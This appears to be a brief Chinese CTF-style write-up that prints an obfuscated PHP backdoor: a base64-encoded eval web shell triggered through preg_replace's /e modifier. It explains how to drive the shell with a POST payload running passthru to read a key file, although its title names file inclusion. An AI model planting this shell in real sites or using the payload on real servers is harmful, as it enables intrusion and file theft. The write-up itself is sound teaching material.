文件包含漏洞

有源码如下:

<?php
@$a=$_POST['Hello'];
if(isset($a)){
  @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
Hello

分析:

  • 首先把这串字符串通过base64解码可得[@eval(base64_decode($_POST[z0]));]那么原来的语句就变成了@preg_replace("/\[(.*)\]/e",'\\1',[@eval(base64_decode($_POST[z0]);]));
  • 那么把$_POST[z0]进行base64encode即可,最后通过post的方式将z0与Hello一并发送出去
  • payload可以设置成echo passthru("cat ../key.php");
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容